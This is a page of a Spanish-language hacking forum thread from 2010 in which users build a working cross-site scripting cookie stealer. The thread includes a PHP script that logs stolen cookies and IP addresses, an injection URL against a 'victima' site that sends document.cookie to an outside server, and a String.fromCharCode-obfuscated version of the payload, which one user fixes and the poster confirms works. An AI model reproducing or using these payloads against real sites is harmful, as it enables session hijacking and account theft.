XSS Help!!! página 2

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Foro

Web

Blog

19 Abril 2024, 14:44 pm

Tema destacado: Como proteger una cartera - billetera de Bitcoin

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

XSS Help!!!

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: 1 [2] 3

Autor

Tema: XSS Help!!! (Leído 8,241 veces)

[{O_o}]

Desconectado

Mensajes: 53

Re: XSS Help!!!

« Respuesta #10 en: 10 Febrero 2010, 22:49 pm »

chmod 777 c.php
PHP SCRIPT:

<?php
$cookie = urldecode($_GET['c']);
$fp = fopen("log.txt", "a");
$cookie = $cookie . ": ".$_SERVER['REMOTE_ADDR']." at ".date("r",time())."\n";
fwrite($fp, "$cookie \n");
fclose($fp);
header("Location: http://google.com ");
?>

XSS BUG URL:

http://victima.com?r="><script>selft.location='http://url.com/c.php?c='+document.cookie;</script>

LOG.TXT:

pero si pongo

http://victima?r="><script>selft.location='http://url.com/c.php?c=';</script>

LOG.TXT:
: x.x.x.x at Wed, 10 Feb 2010 10:56:34 -0400

Gracias!


« Última modificación: 10 Febrero 2010, 23:01 pm por [{O_o}] »	En línea

~ Yoya ~

Wiki

Desconectado

Mensajes: 1.125

Re: XSS Help!!!

« Respuesta #11 en: 10 Febrero 2010, 22:59 pm »

Tio hacerlo con el String.fromCharCode() y veras que funcionara y cuentas.


	En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Castg!

Wiki

Desconectado

Mensajes: 1.191

Re: XSS Help!!!

« Respuesta #12 en: 10 Febrero 2010, 23:00 pm »

no creo q te convenga poner la url original.. :S cambiala por ****


	En línea

Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma

[{O_o}]

Desconectado

Mensajes: 53

Re: XSS Help!!!

« Respuesta #13 en: 10 Febrero 2010, 23:02 pm »

Solo la puse asi para que ustedes trataran!!!


	En línea

~ Yoya ~

Wiki

Desconectado

Mensajes: 1.125

Re: XSS Help!!!

« Respuesta #14 en: 10 Febrero 2010, 23:05 pm »

Tranquilo man, anda y usa String.fromCharCode(), aveces es mejor que pongas la url.


	En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

[{O_o}]

Desconectado

Mensajes: 53

Re: XSS Help!!!

« Respuesta #15 en: 10 Febrero 2010, 23:09 pm »

No funciona tio

con el code tratat de agregarle el + document.cookie; al ejemplo que me diste a ver si te junciona.

Gracias


	En línea

~ Yoya ~

Wiki

Desconectado

Mensajes: 1.125

Re: XSS Help!!!

« Respuesta #16 en: 10 Febrero 2010, 23:14 pm »

No te lo puedo agregar correctamente porque no se la direccion de tu web, pon lo que pusistee y miro que hiziste mal


	En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

[{O_o}]

Desconectado

Mensajes: 53

Re: XSS Help!!!

« Respuesta #17 en: 10 Febrero 2010, 23:16 pm »

"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 115, 99, 114, 105, 112, 116, 62))</script>

esto fue lo que puse y no salio nada


	En línea

~ Yoya ~

Wiki

Desconectado

Mensajes: 1.125

Re: XSS Help!!!

« Respuesta #18 en: 10 Febrero 2010, 23:38 pm »

Bueno este debe funcionar:

Código:

"><script>document.write(String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 61, 34, 104, 116, 116, 112, 58, 47, 47, 105, 109, 117, 115, 97, 46, 117, 115, 47, 99, 46, 112, 104, 112, 63, 99, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62))</script>


	En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

[{O_o}]

Desconectado

Mensajes: 53

Re: XSS Help!!!

« Respuesta #19 en: 10 Febrero 2010, 23:49 pm »

Ya mucha gracias lo hice con unicode para la url y me funciono perfectamente jijiji


	En línea

Páginas: 1 [2] 3

Ir a: